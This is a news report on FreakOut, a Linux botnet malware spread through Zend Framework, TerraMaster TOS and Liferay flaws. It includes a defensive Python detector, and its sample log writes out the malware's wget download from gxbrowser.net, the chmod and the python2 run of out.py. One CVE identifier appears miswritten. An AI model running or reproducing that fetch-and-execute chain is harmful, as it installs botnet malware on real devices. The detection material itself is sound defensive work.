A new malware variant is being used in attacks on Linux devices, adding the compromised devices to a botnet that is used for cryptocurrency mining and distributed denial-of-service (DDoS) attacks. The new malware, dubbed FreakOut, places an infected device under the control of the botnet operator, who uses it to launch remote attacks on other vulnerable devices.
The malware variant was identified by researchers at Check Point, who believe it is distributed through the exploitation of three vulnerabilities: a critical deserialization bug (CVE-2021-3007) in Zend Framework, a popular collection of library packages used for building web applications; a remote code execution flaw (CVE-2021-28188) in TerraMaster TOS, the operating system used in TerraMaster's data storage devices; and a critical deserialization of untrusted data flaw (CVE-2020-7961) in Liferay Portal, an open-source enterprise portal used for developing web portals and websites.
Once one of the above flaws has been successfully exploited, the attackers download a Python script (out.py) from https://gxbrowser[.]net, grant it execute permissions, and run it using Python 2. When run, the script gathers information to fingerprint the infected device, conducts port scans, and sniffs data packets and network traffic. The script is also capable of conducting brute force attacks using hard-coded passwords to gain access to, and infect, other devices on the network.
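As an added illustration (not code from Check Point or from this article), the following detector flags the download, chmod and Python 2 execution steps described above in a constructed process-execution log; the log format, hostnames and user IDs are assumptions, and only the gxbrowser[.]net domain and the out.py script name come from the article.

```python
import re
from typing import List, Tuple

# Indicators taken from the article: the dropper is fetched from gxbrowser[.]net
# (written undefanged here so it matches real log text), saved as out.py,
# made executable and run with Python 2.
FREAKOUT_RULES = [
    ("download from gxbrowser.net", re.compile(r"\b(?:wget|curl)\b.*gxbrowser\.net", re.I)),
    ("out.py made executable", re.compile(r"\bchmod\b.*\bout\.py\b")),
    ("out.py executed with python2", re.compile(r"\bpython2?(?:\.\d+)?\b.*\bout\.py\b")),
]


def scan_process_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, rule name) for every log line matching a FreakOut indicator."""
    hits = []
    for n, line in enumerate(lines, 1):
        for name, pattern in FREAKOUT_RULES:
            if pattern.search(line):
                hits.append((n, name))
    return hits


def infection_chain_seen(lines: List[str]) -> bool:
    """True when all three stages of the chain described in the article appear in the log."""
    seen = {name for _, name in scan_process_log(lines)}
    return len(seen) == len(FREAKOUT_RULES)


# Constructed sample of a process-execution log (hypothetical format, not a real capture).
SAMPLE_LOG = [
    '2021-01-10T12:00:01Z nas01 uid=33 cmd="/usr/bin/wget http://gxbrowser.net/out.py -O /tmp/out.py"',
    '2021-01-10T12:00:02Z nas01 uid=33 cmd="chmod 755 /tmp/out.py"',
    '2021-01-10T12:00:03Z nas01 uid=33 cmd="python2 /tmp/out.py"',
    '2021-01-10T12:05:00Z nas01 uid=0 cmd="python3 /opt/backup/checkout.py"',   # benign
    '2021-01-10T12:06:00Z nas01 uid=1000 cmd="curl -s https://example.com/index.html"',  # benign
]

if __name__ == "__main__":
    for line_no, rule in scan_process_log(SAMPLE_LOG):
        print(f"line {line_no}: {rule}")
    print("full infection chain seen:", infection_chain_seen(SAMPLE_LOG))
```

Matching only the hard-coded domain and filename is brittle, so in practice these rules would sit alongside the IPS signatures and patching the article recommends rather than replace them.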
Check Point researchers say 185 devices are known to have been infected with the malware, and between January 8 and January 13, 380 attacks on its customers were blocked. Most of the attacks have targeted organizations in the financial services and healthcare sectors and government agencies in the United States and Western Europe.
Patches have been released to fix all three vulnerabilities, so users should ensure the affected products are updated and running the latest version of the software. Check Point also recommends implementing an Intrusion Prevention System (IPS) to block attempts to exploit vulnerabilities in systems and applications, conventional signature-based antivirus solutions on endpoints, and a comprehensive advanced endpoint protection solution.